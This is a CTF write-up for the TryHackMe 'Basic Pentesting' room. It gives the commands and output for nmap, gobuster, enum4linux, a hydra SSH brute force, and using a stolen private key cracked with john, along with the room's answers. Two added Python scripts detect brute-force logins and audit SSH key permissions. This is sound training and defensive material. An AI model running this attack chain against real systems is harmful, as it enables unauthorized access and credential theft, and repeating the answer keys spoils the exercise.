[CTF] Tryhackme - Basic Pentesting

Tasks

  • Find the services exposed by the machine
  • What is the name of the hidden directory on the web server(enter name without /)?
  • User brute-forcing to find the username & password
  • What is the username?
  • What is the password?
  • What service do you use to access the server(answer in abbreviation in all caps)?
  • Enumerate the machine to find any vectors for privilege escalation
  • What is the name of the other user you found(all lower case)?
  • If you have found another user, what can you do with this information?
  • What is the final password you obtain?

Find the services exposed by the machine

We can check services via nmap.

Let's try it.

nmap -sC -sV

  • -sC = run all default scripts
  • -sV = find the version of the services
$ nmap -sC -sV 10.10.52.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 17:47 CST
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 17:49 (0:00:30 remaining)
Nmap scan report for 10.10.52.207
Host is up (0.23s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13?
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http-proxy
|_http-title: Apache Tomcat/9.0.7
| fingerprint-strings: 
|   LPDString, X11Probe: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 2243
|     Date: Tue, 10 Sep 2024 09:49:44 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|_    Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-favicon: Apache Tomcat

That answers the first question: the scan lists every exposed service together with its version.

What is the name of the hidden directory on the web server(enter name without /)?

To find hidden directories we use gobuster with a wordlist. Kali Linux ships standard wordlists in SecLists; I use a small version from GitHub.

└─$ gobuster -w ./Downloads/common.txt dir -u 10.10.52.207
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.52.207
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ./Downloads/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/development          (Status: 301) [Size: 318] [--> http://10.10.52.207/development/]
Progress: 1942 / 1943 (99.95%)
===============================================================
Finished
===============================================================

We found the directory /development.

Answer: development

User brute-forcing to find the username & password

First we check what we have in /development.

┌──(admin㉿PREDATOR-01)-[~]
└─$ curl http://10.10.52.207/development/j.txt
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

┌──(admin㉿PREDATOR-01)-[~]
└─$ curl http://10.10.52.207/development/dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

┌──(admin㉿PREDATOR-01)-[~]

Interesting: we have two people, K and J. Our nmap scan also showed an SMB server configured and open (ports 139 and 445).

We can use enum4linux to enumerate data from Windows and Samba hosts.

https://www.kali.org/tools/enum4linux/

We don't need any extra parameters here; just run enum4linux IPTARGET. The relevant part of the output:

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

Perfect, we found two users.

Answer: jan

What is the password?

https://www.kali.org/tools/hydra/

To brute-force the password, we use hydra.

└─$ hydra -l jan -P rockyou.txt ssh://10.10.52.207
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-10 18:34:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.52.207:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
[ERROR] Can not create restore file (./hydra.restore) - Permission denied
[22][ssh] host: 10.10.52.207   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-10 18:41:11

We found our password.

Password: armando
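From the defender's side, the hydra run above leaves a very loud trace in sshd's log: hundreds of "Failed password" lines per minute from one source, followed by an "Accepted password" once the guess lands. The following script is an added example (not part of the original post) that flags exactly that pattern in auth.log-style lines; the log lines, hostname and IPs are constructed samples.

```python
"""Detect an SSH password brute force like the hydra run above from sshd log lines.
Added example, not from the original post; the log lines are constructed samples."""
import re
from collections import defaultdict
from datetime import datetime

# sshd auth.log format: "<Mon dd HH:MM:SS> <host> sshd[<pid>]: Failed|Accepted password for
# [invalid user ]<user> from <ip> port <n> ssh2"
LINE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) password for "
                  r"(?:invalid user )?(\S+) from (\S+) port \d+")

def parse(line: str, year: int = 2024):
    """Return (timestamp, result, user, ip) or None for lines that are not password auth events."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4)

def detect_bruteforce(lines, threshold: int = 10, window_s: int = 60):
    """Alerts as (ip, kind, user): 'burst' when an IP reaches `threshold` failed logins inside a
    `window_s`-second sliding window, 'success_after_burst' when a flagged IP later gets accepted."""
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    flagged, alerts = set(), []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        if result == "Failed":
            failures[ip] = [t for t in failures[ip] if (ts - t).total_seconds() <= window_s] + [ts]
            if len(failures[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "burst", user))
        elif ip in flagged:            # the guessed password was eventually accepted
            alerts.append((ip, "success_after_burst", user))
    return alerts

# constructed sample: 12 failures in 12 seconds from one source, then an accepted login from it
SAMPLE_LOG = [f"Sep 10 18:34:{12 + i:02d} basic2 sshd[{1000 + i}]: Failed password for jan "
              f"from 10.9.0.5 port {40000 + i} ssh2" for i in range(12)]
SAMPLE_LOG += ["Sep 10 18:41:10 basic2 sshd[1100]: Accepted password for jan from 10.9.0.5 port 41000 ssh2",
               "Sep 10 18:41:11 basic2 sshd[1101]: Accepted password for jan from 10.9.0.7 port 41001 ssh2"]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(*alert)
```

The second accepted login (from 10.9.0.7) is deliberately left unflagged: a lone success with no preceding burst is normal traffic, and that is what keeps the rule from paging on every login.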

What service do you use to access the server(answer in abbreviation in all caps)?

We already used this service to crack the password: SSH on port 22.

Answer: SSH

Enumerate the machine to find any vectors for privilege escalation

Okay, we need to find other vectors. We connect via SSH to jan's account and look around.

After navigating a bit we find kay's home folder. It contains a .bak file we cannot open, but there is also a hidden private key (use ls -la to see it).

What is the name of the other user you found(all lower case)?

Answer: kay

If you have found another user, what can you do with this information?

We copy the private key and try to connect to his account via SSH.

└─$ ssh kay@10.10.52.207 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
kay@10.10.52.207's password: 

Okay, we have to fix the permissions of our copied private key with chmod. But it still seems that kay needs a password: the private key is passphrase-protected. So we have to crack that passphrase with another wordlist run.
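Two things let this escalation work: kay's private key was readable by another user, and its passphrase was weak enough for a wordlist. The audit script below is an added example (not from the original post) that an administrator can run as root to find both conditions; it assumes keys live under /home/<user>/.ssh/id_*, and the key containers it builds are constructed stubs for the parser, not real keys.

```python
"""Audit SSH private keys for the two weaknesses the writeup exploits to move from jan to kay:
a key another user can read, and a key stored without a passphrase.
Added example, not from the original post; the key containers below are constructed stubs."""
import base64
import stat
import struct
from pathlib import Path

MAGIC = b"openssh-key-v1\0"   # leading bytes of the new-style OpenSSH container

def make_openssh_container(cipher: bytes) -> bytes:
    """Constructed stub: only the magic and the cipher-name field, enough to exercise the parser."""
    blob = MAGIC + struct.pack(">I", len(cipher)) + cipher
    return (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob)
            + b"\n-----END OPENSSH PRIVATE KEY-----\n")

def key_is_encrypted(data: bytes) -> bool:
    """True if the key is passphrase-protected, for legacy PEM or the openssh-key-v1 container."""
    if b"Proc-Type: 4,ENCRYPTED" in data:   # legacy PEM, the MD5/AES form john reported above
        return True
    if b"BEGIN OPENSSH PRIVATE KEY" in data:
        body = b"".join(ln for ln in data.splitlines() if not ln.startswith(b"-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(MAGIC):
            return False
        off = len(MAGIC)
        (n,) = struct.unpack(">I", blob[off:off + 4])   # length-prefixed cipher name follows magic
        return blob[off + 4:off + 4 + n] != b"none"      # cipher "none" means no passphrase
    return False

def classify_key(data: bytes, mode: int) -> dict:
    """Combine the file mode bits and key content into the two findings that matter."""
    return {"others_can_read": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
            "encrypted": key_is_encrypted(data)}

def audit_home_dirs(root: Path = Path("/home")) -> list:
    """Walk <root>/*/.ssh/ and return keys that other users can read or that have no passphrase."""
    findings = []
    for key in root.glob("*/.ssh/id_*"):
        if key.suffix == ".pub" or not key.is_file():
            continue
        f = classify_key(key.read_bytes(), stat.S_IMODE(key.stat().st_mode))
        if f["others_can_read"] or not f["encrypted"]:
            findings.append((str(key), f))
    return findings

if __name__ == "__main__":
    for path, finding in audit_home_dirs():
        print(path, finding)
```

A key that is encrypted but world-readable still shows up, as it should: in this room the passphrase fell to rockyou.txt in under a second.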

For cracking I use John The Ripper.

First we convert the private key into a hash format john understands. We do that with ssh2john:

ssh2john id_rsa.txt >decrypt.txt

Afterwards we run john against it with the same rockyou.txt wordlist we used for hydra.

┌──(admin㉿PREDATOR-01)-[/usr/share/wordlists]
└─$ john --wordlist=./rockyou.txt ~/decrypt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (/home/admin/id_rsa)
1g 0:00:00:00 DONE (2024-09-10 19:07) 25.00g/s 2068Kp/s 2068Kc/s 2068KC/s catana..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

And the passphrase is beeswax. Let's connect as kay via SSH:

ssh kay@TARGET -i id_rsa.txt

We are connected. Last step, check the file:

kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

And we have our final answer:

Password: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

What is the final password you obtain?

Password: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Thoughts:

It is called Basic Pentesting, but you have to be familiar with several tools to solve this level. What did we learn?

  • using hydra to brute-force passwords
  • using john to crack passphrases out of private keys
  • using gobuster to find directories
  • using enum4linux to gather information about SMB and Samba
  • using nmap to find open ports and services

Hope you liked it.

This post is licensed under CC BY 4.0 by the author.